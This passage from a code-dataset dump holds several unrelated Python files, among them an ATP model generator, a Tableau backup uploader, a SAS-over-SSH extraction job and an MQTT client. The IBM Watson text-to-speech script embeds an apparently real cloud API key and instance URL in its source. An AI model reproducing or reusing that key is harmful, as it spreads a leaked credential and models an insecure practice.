print(\"create_switch\")\n print(dicSwitch.argList)\n\n switch = []\n # switch parameter settings\n argEntity = dicSwitch.getEntities()\n\n for k, v in list(self.__handler.switch.items()):\n # skip three-phase nodes directly\n if k.endswith('*'):\n continue\n\n # no parameters configured\n if k not in argEntity:\n switch.append(v.clone())\n continue\n\n # handle the case where one component has parameter settings on several nodes\n # as long as this node still appears in the parameter settings\n while k in argEntity:\n # get the node index, clear that node, and fetch the arg list\n index = argEntity.index(k)\n argList = ArgvToList.toList(dicSwitch.getArg(index), total, time)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # build the nodes with the parameter settings applied\n argSwitch = []\n for i in range(len(argList)):\n # odd-positioned parameter: closing time\n if i % 2 == 0:\n temp = v.clone()\n temp.tclose = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n argSwitch.append(temp)\n # even-positioned parameter: opening time\n elif i % 2 == 1:\n argSwitch[i // 2].top = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n # temp.top = Convert.toDecimal(argList[i])\n\n # more than two parameters with an odd count, i.e. the last entry has no opening time\n if (len(argList) > 2) and (len(argList) // 2 == 1):\n argSwitch[-1].top = Config.get_time_max()\n\n switch.extend(argSwitch)\n\n return switch\n\n def create_branch(self, dicBranch, total, time):\n \"\"\"\n Create branch entries from the parameter settings\n :param dicBranch: argDic['branch']\n :param total:\n :param time:\n :return: the generated branch entries\n \"\"\"\n print(\"create_branch\")\n print(dicBranch.argList)\n\n branch = []\n # parameter settings\n argEntity = dicBranch.getEntities()\n\n for k, v in list(self.__handler.branch.items()):\n # skip three-phase trunk lines directly\n if k.endswith('*'):\n continue\n\n # no parameters configured\n if k not in argEntity:\n branch.append(v.clone())\n continue\n\n # if one component has parameter settings on several nodes, take only the first and ignore the rest\n index = argEntity.index(k)\n arg = dicBranch.getArg(index)\n argList = ArgvToList.toList(dicBranch.getArg(index), total, time)\n while k in argEntity:\n index = argEntity.index(k)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # build the node with the parameter settings applied\n # check every single node of the three phases\n e = v.clone()\n i = 0\n\n if not e.r == 0 and i < len(argList):\n e.r = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n i += 1\n\n if not e.l == 0 and i < len(argList):\n e.l = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n i += 1\n\n if not e.c == 0 and i < len(argList):\n e.c = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n i += 1\n\n branch.append(e)\n\n return branch\n\n def create_lcc(self, dicLcc):\n \"\"\"\n Create lcc entries from the parameter settings\n :param dicLcc: argDic['lcc']\n :return: the generated lcc entries\n \"\"\"\n print(\"create_lcc\")\n print(dicLcc.argList)\n\n lcc = []\n # parameter settings\n 
argEntity = dicLcc.getEntities()\n\n for k, v in list(self.__handler.lcc.items()):\n\n # no parameters configured\n if k not in argEntity:\n lcc.append(v.clone())\n continue\n\n # if one component has parameter settings on several nodes, take only the first and ignore the rest\n index = argEntity.index(k)\n while k in argEntity:\n index = argEntity.index(k)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # build the node with the parameter settings applied\n lcc.extend(LccLib.modify(v, dicLcc.getArg(index)))\n\n return lcc\n\n def create_source(self, dicSource, total, time):\n \"\"\"\n Create source entries from the parameter settings\n :param dicSource: argDic['source']\n :param total:\n :param time:\n :return: the generated source entries\n \"\"\"\n print(\"create_source\")\n print(dicSource.argList)\n\n source = []\n # parameter settings\n argEntity = dicSource.getEntities()\n\n for node, element in list(self.__handler.source.items()):\n # three-phase trunk lines\n if node.endswith('*'):\n a, b, c = Triple.tripleToSingle(self.__handler.source, node)\n argList = ArgvToList.toList(dicSource.getArg(argEntity.index(node)), total,\n time) if node in argEntity else []\n if len(argList) > 0:\n a.ampl = b.ampl = c.ampl = Convert.toDecimal(argList[0])\n if len(argList) >= 2:\n a.phase = Convert.toDecimal(argList[1])\n b.phase = a.phase - 120\n c.phase = a.phase + 120\n source.append(a)\n source.append(b)\n source.append(c)\n continue\n\n # ignore if covered by a three-phase node\n if (node[:-1] + '*') in list(self.__handler.source.keys()):\n continue\n # no parameters configured\n if node not in argEntity:\n source.append(element.clone())\n continue\n\n index = argEntity.index(node)\n\n # if one component has parameter settings on several nodes, take only the first and ignore the rest\n argList = ArgvToList.toList(dicSource.getArg(index), total, time)\n while node in argEntity:\n index = argEntity.index(node)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # build the node with the parameter settings applied\n e = element.clone()\n\n if len(argList) > 0:\n e.ampl = Convert.toDecimal(argList[0])\n if len(argList) >= 2:\n e.phase = Convert.toDecimal(argList[1])\n\n source.append(e)\n\n return source\n\n def create_arrester(self, dicArrester, total, time):\n \"\"\"\n Create arrester entries from the parameter settings\n :param dicArrester: argDic['arrester']\n :param total:\n :param time:\n :return: the generated arrester entries\n \"\"\"\n print(\"create_arrester\")\n print(dicArrester.argList)\n\n arrester = []\n # parameter settings\n argEntity = dicArrester.getEntities()\n\n for node, element in list(self.__handler.arrester.items()):\n # arresters are always three-phase\n if not node.endswith('*'):\n continue\n\n a, b, c = Triple.tripleToSingle(self.__handler.arrester, node)\n argList = ArgvToList.toList(dicArrester.getArg(argEntity.index(node)), total,\n time) if node in argEntity else []\n if len(argList) > 0:\n a.vref = Convert.toDecimal(argList[0])\n\n arrester.append(a)\n arrester.append(b)\n arrester.append(c)\n\n return arrester\n\n def create_thunder(self, dicThunder, total, time):\n\n \"\"\"\n Create thunder (lightning source) entries from the parameter settings\n :param dicThunder: argDic['thunder']\n :param total:\n :param time:\n :return: the generated thunder entries\n \"\"\"\n print(\"create_thunder\")\n print(dicThunder.argList)\n\n thunder = []\n # parameter settings\n argEntity = dicThunder.getEntities()\n\n for node, element in list(self.__handler.thunder.items()):\n # no parameters configured\n if node not in argEntity:\n thunder.append(element.clone())\n continue\n\n index = argEntity.index(node)\n\n # if one component has parameter settings on several nodes, take only the first and ignore the rest\n argList = ArgvToList.toList(dicThunder.getArg(index), total, time)\n while node in argEntity:\n index = argEntity.index(node)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # build the node with the parameter settings applied\n e = element.clone()\n\n if len(argList) > 0:\n e.ampl = Convert.toDecimal(argList[0])\n if len(argList) > 1:\n e.freq = Convert.toDecimal(argList[1])\n if len(argList) > 2:\n e.phase 
= Convert.toDecimal(argList[2])\n\n thunder.append(e)\n\n return thunder\n\n def __argSet(self):\n \"\"\"\n First configure the new instance entries from the given parameters\n :return:\n \"\"\"\n pass\n\n def __infoWrite(self, info):\n \"\"\"\n Write the opening comment section\n :param info:\n :return:\n \"\"\"\n self.__file.write(info.generate())\n\n def __headWrite(self, head):\n \"\"\"\n Write the first header record\n :param head:\n :return:\n \"\"\"\n self.__file.write(head.generate())\n\n def __branchWrite(self, list):\n \"\"\"\n Write the branch records\n :param list:\n :return:\n \"\"\"\n self.__file.writelines(['/BRANCH\\n',\n 'C < n1 >< n2 >< R >< L >< C >\\n',\n 'C < n1 >< n2 >< R >< A >< B ><><>0\\n'])\n for i in list:\n self.__file.write(i.generate())\n\n def __arresterWrite(self, list):\n \"\"\"\n Write the arrester records\n :param list:\n :return:\n \"\"\"\n for i in list:\n self.__file.write(i.generate())\n\n def __lccWrite(self, list):\n \"\"\"\n Write the lcc records\n :param list:\n :return:\n \"\"\"\n for i in list:\n self.__file.write(i.generate())\n\n def __switchWrite(self, list):\n \"\"\"\n Write the switch records\n :param list:\n :return:\n \"\"\"\n self.__file.writelines([\"/SWITCH\\n\", \"C < n 1>< n 2>< Tclose >< Ie >< type >\\n\"])\n for i in list:\n self.__file.write(i.generate())\n\n def __sourceWrite(self, list):\n \"\"\"\n Write the source records\n :param list:\n :return:\n \"\"\"\n self.__file.writelines(\n [\"/SOURCE\\n\", \"C < n 1><>< Ampl. >< Freq. >< A1 >< T1 >< TSTART >< TSTOP >\\n\"])\n for i in list:\n self.__file.write(i.generate())\n\n def __thunderWrite(self, list):\n \"\"\"\n Write the thunder (lightning) records\n :param list:\n :return:\n \"\"\"\n for i in list:\n self.__file.write(i.generate())\n\n def __outputWrite(self, output):\n \"\"\"\n Write the output records\n :param output:\n :return:\n \"\"\"\n self.__file.write(\"/OUTPUT\\n\")\n self.__file.write(output.generate())\n\n\nif __name__ == \"__main__\":\n from utils.ArgSet import ArgSet\n\n parseHandler = ParseHandler()\n parseHandler.parse(r\"C:\\Users\\Administrator\\Desktop\\atp\\方式1-N-1-主变合环-涂天线-单相重合闸-0.7s.atp\")\n create = CreateAtp(r\"C:\\Users\\Administrator\\Desktop\\atp\", '方式1-N-1-主变合环-涂天线-单相重合闸-0.7s', parseHandler)\n create.create(1, {'switch': ArgSet(), 'branch': ArgSet()}, '')\n","sub_path":"atp/CreateAtp.py","file_name":"CreateAtp.py","file_ext":"py","file_size_in_byte":15582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"314810348","text":"# -*- encoding: utf-8 -*-\n\nimport os.path\nimport tempfile\nimport sublime\nfrom threading import Thread\nimport urllib.request, urllib.error\nfrom .functions import *\n\nCACHE_FILE = os.path.join(tempfile.gettempdir(),\n 'MarkdownLivePreviewCache.txt')\nTIMEOUT = 20 # seconds\n\nSEPARATOR = '---%cache%--'\n\ndef get_base64_saver(loading, url):\n def callback(content):\n if isinstance(content, urllib.error.HTTPError):\n if content.getcode() == 404:\n loading[url] = 404\n return\n elif isinstance(content, urllib.error.URLError):\n if (content.reason.errno == 11001 and\n content.reason.strerror == 'getaddrinfo failed'):\n loading[url] = 404\n return\n return sublime.error_message('An unexpected error has occurred: ' +\n str(content))\n loading[url] = to_base64(content=content)\n\n return callback\n\ndef get_cache_for(imageurl):\n if not os.path.exists(CACHE_FILE):\n return\n with open(CACHE_FILE) as fp:\n for line in fp.read().splitlines():\n url, base64 = line.split(SEPARATOR, 1)\n if url == imageurl:\n return base64\n\ndef cache(imageurl, base64):\n with open(CACHE_FILE, 'a') as fp:\n fp.write(imageurl + SEPARATOR + base64 + '\\n')\n\nclass ImageLoader(Thread):\n\n def 
__init__(self, url, callback):\n Thread.__init__(self)\n self.url = url\n self.callback = callback\n\n def run(self):\n try:\n page = urllib.request.urlopen(self.url, None, TIMEOUT)\n except Exception as e:\n self.callback(e)\n else:\n self.callback(page.read())\n\n\nclass ImageManager(object):\n\n \"\"\"\n Usage:\n\n >>> image = ImageManager.get('http://domain.com/image.png')\n >>> image = ImageManager.get('http://domain.com/image.png')\n # still loading (this is a comment, not an output), it doesn't\n # run another request\n >>> image = ImageManager.get('http://domain.com/image.png')\n 'data:image/png;base64,....'\n \"\"\"\n loading = {}\n\n @staticmethod\n def get(imageurl, user_callback=None):\n\n cached = get_cache_for(imageurl)\n if cached:\n return cached\n elif imageurl in ImageManager.loading.keys():\n # return None (the file is still loading, already made a request)\n # return string the base64 of the url (which is going to be cached)\n temp_cached = ImageManager.loading[imageurl]\n if temp_cached == 404:\n return to_base64('404.png')\n if temp_cached:\n cache(imageurl, temp_cached)\n del ImageManager.loading[imageurl]\n return temp_cached\n else:\n # load from internet\n ImageManager.loading[imageurl] = None\n callback = get_base64_saver(ImageManager.loading, imageurl)\n loader = ImageLoader(imageurl, callback)\n loader.start()\n sublime.set_timeout_async(lambda: loader.join(), TIMEOUT * 1000)\n","sub_path":"image_manager.py","file_name":"image_manager.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"531562686","text":"import tableauserverclient as TSC\nimport json\nimport datetime\nimport os, errno\nimport logging\nimport shutil\nimport boto3\nfrom argparse import ArgumentParser\nimport sys\n\nproject_children = {}\nprojects = {}\nproject_paths = {}\n\ndef zipdir(path, ziph):\n # ziph is zipfile handle\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file))\n\ndef folder_builder(root_id):\n\tfor project_id in project_children[root_id]:\n\t\tfolder_name = projects[project_id].name\n\t\tfolder_path = project_paths[root_id] + \"/\" + folder_name\n\t\tproject_paths[project_id] = folder_path\n\t\ttry:\n\t\t os.makedirs(folder_path)\n\t\texcept OSError as e:\n\t\t\tpass\n\t\tif project_id in project_children:\n\t\t\tfolder_builder(project_id)\n\ndef main():\n\tparser = ArgumentParser()\n\tparser.add_argument(\"-c\", \"--config\", dest=\"config_file_path\",\n\t help=\"path to config file to be used\", metavar=\"CONFIG\")\n\n\targs = parser.parse_args()\n\n\tif not args.config_file_path:\n\t\tprint('You must include a config file path')\n\t\tsys.exit(1) # abort because of error\n\t#Get configs\n\twith open(args.config_file_path) as json_file:\n\t\tjson_data = json.load(json_file)\n\n\tUSERNAME = json_data['username']\n\tPASSWORD = json_data['password']\n\tSITE = json_data['site']\n\tSERVER = json_data['server']\n\tBACKUP_ROOT = json_data['backup_directory']\n\tBUCKET_NAME = json_data['bucket_name']\n\n\t#Log to backup root\n\tlogging.basicConfig(filename=BACKUP_ROOT + '/' +'backup.log',level=logging.INFO)\n\tlogging.info(\"Starting at: \" + str(datetime.datetime.today()))\n\n\t#Create Backup Directory\n\tbackup_date = datetime.datetime.today().strftime('%Y-%m-%d')\n\tbackup_directory = BACKUP_ROOT + \"/\" + backup_date\n\n\ttry:\n\t os.makedirs(backup_directory)\n\texcept OSError as e:\n\t pass\n\n\t#Set up auth and server 
object\n\ttableau_auth = TSC.TableauAuth(USERNAME, PASSWORD, site_id=SITE)\n\tserver = TSC.Server(SERVER, use_server_version=True)\n\n\t#Get Projects\n\n\tserver.auth.sign_in(tableau_auth)\n\n\tfor project in TSC.Pager(server.projects):\n\t\tprojects[project.id] = project\n\t\tif project.parent_id in project_children:\n\t\t\tproject_children[project.parent_id].append(project.id)\n\t\telse:\n\t\t\tproject_children[project.parent_id] = [project.id]\n\n\t#Start Building\n\t#Root at None\n\tproject_paths[None] = backup_directory\n\tfolder_builder(None)\n\n\tlogging.info('Folder structure built')\n\n\t#Iterate through workbooks\n\tfor workbook in TSC.Pager(server.workbooks):\n\t\t#Get project location\n\t\tlocation = project_paths[workbook.project_id]\n\t\t#Download workbook without Extract to location\n\t\tserver.workbooks.download(workbook.id, filepath=location, no_extract=True)\n\n\tlogging.info('Workbooks downloaded')\n\tserver.auth.sign_out()\n\n\t#Create zipfile\n\tbackup_name = 'tableau-backup-' + backup_date\n\tbackup_zip = BACKUP_ROOT + '/' + backup_name\n\tshutil.make_archive(backup_zip, 'zip', backup_directory)\n\tbackup_name += '.zip'\n\tbackup_zip +='.zip'\n\t#Remove directory\n\ttry:\n\t shutil.rmtree(backup_directory)\n\texcept OSError as e:\n\t logging.error(\"Error: %s - %s.\" % (e.filename, e.strerror))\n\n\t#upload to s3\n\n\ts3 = boto3.resource('s3')\n\tdata = open(backup_zip, 'rb')\n\ts3.Bucket(BUCKET_NAME).put_object(Key=backup_name, Body=data)\n\tlogging.info('Uploaded ' + backup_name + ' to S3 bucket ' + BUCKET_NAME)\n\n\t#Remove ZIP\n\tos.remove(backup_zip)\n\tlogging.info(\"Ended at: \" + str(datetime.datetime.today()))\n\nif __name__ == \"__main__\":\n main()","sub_path":"tableau_backup/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544460623","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nimport ARM\nfrom WeaknessAnalysisPanel import WeaknessAnalysisPanel\nfrom Borg import Borg\n\nclass WeaknessAnalysisDialog(wx.Dialog):\n def __init__(self,parent,cvName,envName):\n wx.Dialog.__init__(self,parent,-1,'Weakness analysis for ' + cvName,style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(600,350))\n self.panel = 0\n self.theThreatTargets = []\n self.theVulnerabilityTargets = []\n self.theGoalObstacles = []\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n self.panel = WeaknessAnalysisPanel(self,cvName,envName)\n mainSizer.Add(self.panel,1,wx.EXPAND)\n self.SetSizer(mainSizer)\n wx.EVT_BUTTON(self,armid.WEAKNESSANALYSIS_BUTTONCOMMIT_ID,self.onCommit)\n\n def onCommit(self,evt):\n thrList = self.FindWindowById(armid.WEAKNESSANALYSIS_LISTTHREATS_ID)\n vulList = self.FindWindowById(armid.WEAKNESSANALYSIS_LISTVULNERABILITIES_ID)\n goList = self.FindWindowById(armid.WEAKNESSANALYSIS_LISTGOALOBSTACLE_ID)\n\n thrDict = thrList.dimensions() \n for thrName in thrDict:\n target = thrDict[thrName]\n if target.requirement() != '':\n self.theThreatTargets.append(target) \n vulDict = vulList.dimensions() \n for vulName in vulDict:\n target = vulDict[vulName]\n if target.requirement() != '':\n self.theVulnerabilityTargets.append(target) \n\n self.theGoalObstacles = goList.dimensions()\n self.EndModal(armid.WEAKNESSANALYSIS_BUTTONCOMMIT_ID)\n def targets(self):\n return self.theThreatTargets + self.theVulnerabilityTargets\n\n def goalObstacles(self):\n return self.theGoalObstacles\n","sub_path":"cairis/cairis/WeaknessAnalysisDialog.py","file_name":"WeaknessAnalysisDialog.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"613359441","text":"\n\nimport os\nimport sys\nfrom string import Template\nimport paramiko\n\n\nif __name__ == \"__main__\":\n\n segment = sys.argv[2]\n\n\n sas_code = Template(\"\"\"\nlibname cat_lib META LIBRARY=TOYPosProdStoreLevWeekly;\n\nproc sql;\n\n\ncreate table work.A as\nselect \ndma, \noutlet, \nbrand, \nppmonth, \nitemnumber, \nsum(unitssold) as units, \nsum(totalvalue) as dollars\nfrom\ncat_lib.vw_toyml_fact_nc\nwhere\nsegment1=1185089780\ngroup by \ndma, outlet, brand, ppmonth, itemnumber;\n\ncreate table work.B as\nselect ppmonth, monthyear from cat_lib.vw_toyml_ppmonth_lu;\n\ncreate table work.C as\nselect itemnumber, item_desc from cat_lib.vw_toyml_item_lu;\n\ncreate table work.D as\nselect outlet, outlet_name from cat_lib.vw_toyml_outlet_lu;\n\ncreate table work.E as\nselect brand, brand_name from cat_lib.vw_toyml_brand_lu;\n\nquit;\n\nproc export data=WORK.A dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.csv'\nreplace;\nrun;\n\nproc export data=WORK.B dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.months.csv'\nreplace;\nrun;\n\nproc export data=WORK.C dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.items.csv'\nreplace;\nrun;\n\nproc export data=WORK.D dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.outlets.csv'\nreplace;\nrun;\n\nproc export data=WORK.E dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.brands.csv'\nreplace;\nrun;\n\n \"\"\").substitute(\n SEGMENT=segment\n )\n\n # paths for sas files\n local_sas_file = 
'/root/airflow/jobs/tmp/toys_price_permission_'+str(segment)+'.sas'\n remote_sas_file = '/sasfiles/aa/analytics_platform/beats/toys_price_permission_'+str(segment)+'.sas'\n\n # write code to disk\n with open(local_sas_file, 'w') as f:\n f.write(sas_code)\n\n # start SSH client\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(os.environ['SAS_HOST'], 22, username=os.environ['SAS_USERNAME'], password=os.environ['SAS_PASSWORD'])\n\n # copy sas code to server\n sftp = ssh.open_sftp()\n sftp.put(local_sas_file, remote_sas_file)\n\n # run sas code\n sas_exec_command = '$GRID_EXEC -gridsubmitpgm '+remote_sas_file+' -METAUSER ' + os.environ['SAS_USERNAME'] + ' -METAPASS ' + os.environ['SAS_METAPASS'] + ' -GRIDWAIT'\n stdin, stdout, stderr = ssh.exec_command(sas_exec_command)\n exit_status = stdout.channel.recv_exit_status()\n\n # delete remote file\n ssh.exec_command('rm ' + remote_sas_file)\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.csv'\n )\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.months.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.months.csv'\n )\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.items.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.items.csv'\n )\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.outlets.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.outlets.csv'\n )\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.brands.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.brands.csv'\n )\n\n # delete remote file\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.csv')\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.brands.csv')\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.items.csv')\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.months.csv')\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.outlets.csv')\n\n # shut down SSH client\n sftp.close()\n ssh.close()\n\n","sub_path":"airflow/jobs/price_permission/toys/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"545243143","text":"import requests\nimport features.src.support.helpers as helpers\nimport re\nimport os\n\n\nclass ImportBooster(object):\n def importGithubRepo(self, gitRepo):\n\n ###############################################\n # Environment variables\n #\n # Note: Pipelines = https://forge.api.openshift.io/api/services/jenkins/pipelines\n # Tokens are stored in a form of \";(;)\"\n theToken = helpers.get_user_tokens().split(\";\")[0]\n projectName = os.getenv('PROJECT_NAME')\n pipeline = os.getenv('PIPELINE')\n spaceId = helpers.getSpaceID()\n authHeader = 'Bearer {}'.format(theToken)\n\n print('Starting test.....')\n\n ###############################################\n # Import the booster\n headers = {'Accept': 'application/json',\n 'Authorization': authHeader,\n 'X-App': 'osio',\n 'X-Git-Provider': 'GitHub',\n 'Content-Type': 
'application/x-www-form-urlencoded'}\n data = {'gitRepository': gitRepo,\n 'projectName': projectName,\n 'pipeline': pipeline,\n 'space': spaceId}\n\n forgeApi = os.getenv(\"FORGE_API\")\n\n print('Making request to import...')\n r = requests.post(\n '{}/api/osio/import'.format(forgeApi),\n headers=headers,\n data=data\n )\n print('request results = {}'.format(r.text))\n\n result = r.text\n if re.search('uuid', result):\n return 'Success'\n else:\n return 'Fail'\n","sub_path":"booster_bdd/features/src/importBooster.py","file_name":"importBooster.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"60375025","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom product.models import Category, Subcategory\n\n\n\ndef index(request):\n array = []\n categories = Category.objects.all()\n for category in categories:\n subcategories = Subcategory.objects.filter(category=category)\n cat = [category, [subcategories]]\n array.append(cat)\n context = {'categories': array}\n return render(request, 'ASA/home.html', context=context)\n\ndef about(request):\n return render(request, 'ASA/about.html')","sub_path":"food_market/ASA/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"171292285","text":"import h5py\r\nimport os\r\nimport numpy as np\r\n\r\nclass HDF5DatasetWriter:\r\n \r\n def __init__(self, dims, outputPath, bufSize=500):\r\n \r\n if os.path.exists(outputPath):\r\n raise ValueError(\"The supplied 'outputPath' already exists; manually delete the file before continuing.\", outputPath)\r\n \r\n print(\"[INFO] Writing external_forces({}) in HDF5 format\".format(dims))\r\n print(\"[INFO] Writing computed_displacements({}) in HDF5 format\".format(dims))\r\n\r\n self.db = h5py.File(outputPath, \"w\")\r\n self.data = self.db.create_dataset(\"external_forces\", dims, dtype=\"float\")\r\n self.labels = self.db.create_dataset(\"computed_displacements\", (dims), dtype=\"float\") \r\n \r\n self.bufSize = bufSize\r\n self.buffer = {\"data\": [], \"labels\": []}\r\n self.idx = 0 \r\n \r\n def add(self, rows, labels):\r\n self.buffer[\"data\"].extend(rows)\r\n self.buffer[\"labels\"].extend(labels)\r\n \r\n if len(self.buffer[\"data\"]) >= self.bufSize:\r\n self.flush()\r\n \r\n \r\n def flush(self):\r\n i = self.idx + len(self.buffer[\"data\"])\r\n self.data[self.idx:i] = self.buffer[\"data\"]\r\n self.labels[self.idx:i] = self.buffer[\"labels\"]\r\n self.idx = i\r\n self.buffer = {\"data\": [], \"labels\": []}\r\n \r\n\r\n \r\n def close(self):\r\n \r\n if len(self.buffer[\"data\"]) > 0:\r\n self.flush()\r\n \r\n self.db.close()\r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"utils/io/hdf5datasetwriter.py","file_name":"hdf5datasetwriter.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"59670584","text":"from ibm_watson import TextToSpeechV1\r\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\r\nfrom playsound import playsound\r\n\r\nauthenticator = IAMAuthenticator('ts89j5bMBWLYT6VScb2J7JVLEnsM0Bi5yvo1L3pVKSqv')\r\ntext_to_speech = TextToSpeechV1(\r\n authenticator=authenticator\r\n)\r\n\r\ntext_to_speech.set_service_url('https://api.eu-gb.text-to-speech.watson.cloud.ibm.com/instances/229c9936-726f-4a8e-9f6b-9a5b5cebf9a4')\r\n\r\nwith open('new_file.mp3', 'wb') as audio_file:\r\n audio_file.write(\r\n 
text_to_speech.synthesize(\r\n            'Hello all how are you hope every one is doing well good morning hemangini maam ',\r\n            voice='en-US_AllisonV3Voice',\r\n            accept='audio/mp3'        \r\n        ).get_result().content)\r\n\r\nplaysound('new_file.mp3')\r\n","sub_path":"t-t-s.py","file_name":"t-t-s.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"268264545","text":"class Data:\n\n    # days in each month; index 0 is unused so month numbers index directly\n    dayspermonth = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n    def __init__(self, month, day, year):\n        if 0 < month <= 12:\n            self.month = month\n        else:\n            raise ValueError(\"Invalid value for month: %d\" % month)\n\n        if year >= 0:\n            self.year = year\n        else:\n            raise ValueError(\"Invalid value for year: %d\" % year)\n\n        self.day = self.checkDay(day)\n        print(\"Date constructor:\", self.display())\n\n    def __del__(self):\n        print(\"Date object about to be destroyed\", self.display())\n\n    def display(self):\n        return \"%d/%d/%d\" % (self.month, self.day, self.year)\n\n    def checkDay(self,testDay):\n        if 0 < testDay <= Data.dayspermonth[self.month]:\n            return testDay\n        elif self.month == 2 and testDay == 29 and \\\n            (self.year % 400 == 0 or self.year % 100 != 0 and self.year % 4 == 0):\n            return testDay\n        else:\n            raise ValueError(\"Invalid day: %d for month: %d\" %\n                             (testDay, self.month))\n\n","sub_path":"chapter 7 python/Definition _of_class_data.py","file_name":"Definition _of_class_data.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"259660856","text":"\"\"\"\nDefines the functions to communicate with Petrolog mqtt Broker\n\"\"\"\n\n__author__ = 'Cesar'\n\n\nimport mosquitto\nfrom deviceCommand_class import deviceCommand\nfrom deviceCommand_class import Commands\nimport config\n\n# Create Mosquitto Client object\nmqttc = mosquitto.Mosquitto(\"mqttPetrologCommands\")\n\n\n# Define event callbacks\ndef on_connect(mosq, obj, rc):\n    config.logging.info(\"Connected, rc: \" + str(rc))\n    # Subscribe to Command\n    mqttc.subscribe('F/#', 0)\n\n\ndef on_message(mosq, obj, msg):\n    msgID = msg.topic.split('/')\n    new_id = msgID[1]\n    for device in Commands:\n        if device.d_id == new_id:\n            # already in list, look for command response\n            if msgID[2] == 'PR':\n                device.response = msg.payload\n                config.logging.debug(\"Responding Command [{0}] with Response [{1}] \"\n                                     .format(device.commandId, device.response))\n                if device.setCommandResponse_via_httpPOST():\n                    config.logging.debug(\"Success!\")\n                else:\n                    config.logging.debug(\"Fail!\")\n            return\n    if new_id != '':\n        Commands.add(deviceCommand(new_id, '', '', '', False))\n    return\n\n\ndef on_publish(mosq, obj, mid):\n    config.logging.debug(\"mid: \" + str(mid))\n\n\ndef on_subscribe(mosq, obj, mid, granted_qos):\n    config.logging.info(\"Subscribed: \" + 